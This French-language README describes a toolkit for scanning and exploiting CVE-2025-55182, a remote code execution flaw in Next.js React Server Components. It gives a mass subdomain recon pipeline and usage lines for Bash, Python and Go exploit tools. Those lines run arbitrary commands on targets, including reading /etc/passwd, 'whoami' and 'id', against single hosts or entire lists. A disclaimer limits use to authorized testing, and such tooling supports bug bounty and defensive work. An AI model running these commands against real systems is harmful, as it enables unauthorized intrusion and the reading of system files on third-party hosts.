
Scanner multilingue pour la RCE CVE-2025-55182 dans les composants serveur React de Next.js, avec des modes de balayage simple/multiple et un flux de travail de reconnaissance bug bounty intégré.
Une boîte à outils complète pour détecter et exploiter CVE-2025-55182, une vulnérabilité critique d'exécution de code à distance dans les applications Next.js utilisant les Composants Serveur React.
Ce dépôt propose un scanner Bash unifié (mode Unique & Masse), des implémentations Python/Go, et un workflow de reconnaissance pour bug bounty.

Pour la chasse en masse sur les domaines génériques, utilisez ce pipeline pour filtrer les cibles avant le scan :
# 1. Énumération des sous-domaines
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. Filtrage des hôtes actifs
httpx -l subs.txt -o live.txt
# 3. Détection pré-scan avec Nuclei (optionnel)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
Le script scanner.sh prend en charge les scans de cible unique et les scans de masse à partir d'une liste de fichiers.
chmod +x scanner.sh
Idéal pour vérifier une cible spécifique avec une sortie détaillée.
# Vérification de base (par défaut "id")
./scanner.sh -d example.com
# Exécution d'une commande personnalisée
./scanner.sh -d https://target.com -c "cat /etc/passwd"
Scanne efficacement une liste d'URL et enregistre les hôtes vulnérables dans un fichier.
# Scanner une liste d'URL
./scanner.sh -l live.txt -c "whoami"
# Fichier de sortie personnalisé
./scanner.sh -l live.txt -o my_bounty.txt
Utilisez-la si vous rencontrez des problèmes avec l'échappement des caractères spéciaux en Bash.
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
Haute performance, dépendances minimales.
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
Cet outil est destiné uniquement à des fins éducatives et aux tests de sécurité autorisés. Toute utilisation non autorisée est strictement illégale. Le développeur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce programme.
Détail NVD CVE : https://nvd.nist.gov/vuln/detail/CVE-2025-55182
Avis de sécurité React (Vulnérabilité des Composants Serveur React) : https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
Modèle Nuclei de ProjectDiscovery : https://cloud.projectdiscovery.io/library/CVE-2025-55182
| Flag | Description |
|---|
-d, --domain | URL cible unique |
-l, --list | Fichier contenant une liste d'URL |
-c, --command | Commande à exécuter (par défaut : id) |
-o, --output | Fichier de sortie pour les hôtes vulnérables (par défaut : vulnerable_hosts.txt) |